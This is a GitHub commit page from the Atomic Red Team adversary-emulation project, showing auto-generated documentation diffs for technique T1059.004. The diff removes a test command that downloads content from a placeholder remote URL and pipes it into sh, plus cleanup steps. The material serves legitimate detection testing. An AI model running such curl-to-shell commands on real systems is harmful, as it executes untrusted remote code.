Skip to content

Commit

Permalink
Generated docs from job=generate-docs branch=master [ci skip]
Browse files Browse the repository at this point in the history
  • Loading branch information
Atomic Red Team doc generator committed Nov 9, 2023
1 parent 8fa4b4c commit 2a6bbc2
Show file tree
Hide file tree
Showing 3 changed files with 7 additions and 20 deletions.
8 changes: 3 additions & 5 deletions atomics/Indexes/index.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -56605,11 +56605,9 @@ execution:
executor:
name: sh
elevation_required: false
command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
|sh\nls -la /tmp/art.txt \n"
cleanup_command: |
rm /tmp/art.txt
uname -srm
command: 'uname -srm

'
T1559:
technique:
x_mitre_platforms:
Expand Down
8 changes: 3 additions & 5 deletions atomics/Indexes/linux-index.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -36323,11 +36323,9 @@ execution:
executor:
name: sh
elevation_required: false
command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
|sh\nls -la /tmp/art.txt \n"
cleanup_command: |
rm /tmp/art.txt
uname -srm
command: 'uname -srm

'
T1559:
technique:
x_mitre_platforms:
Expand Down
11 changes: 1 addition & 10 deletions atomics/T1059.004/T1059.004.md
Original file line number Diff line number Diff line change
Expand Up @@ -690,21 +690,12 @@ An adversary may want to enumerate the kernel information to tailor their attack


```sh
cd /tmp
curl -s #{remote_url}
ls -la /tmp/art.txt
curl -s #{remote_url} |sh
ls -la /tmp/art.txt
```

#### Cleanup Commands:
```sh
rm /tmp/art.txt
uname -srm
```






<br/>

0 comments on commit 2a6bbc2

Please sign in to comment.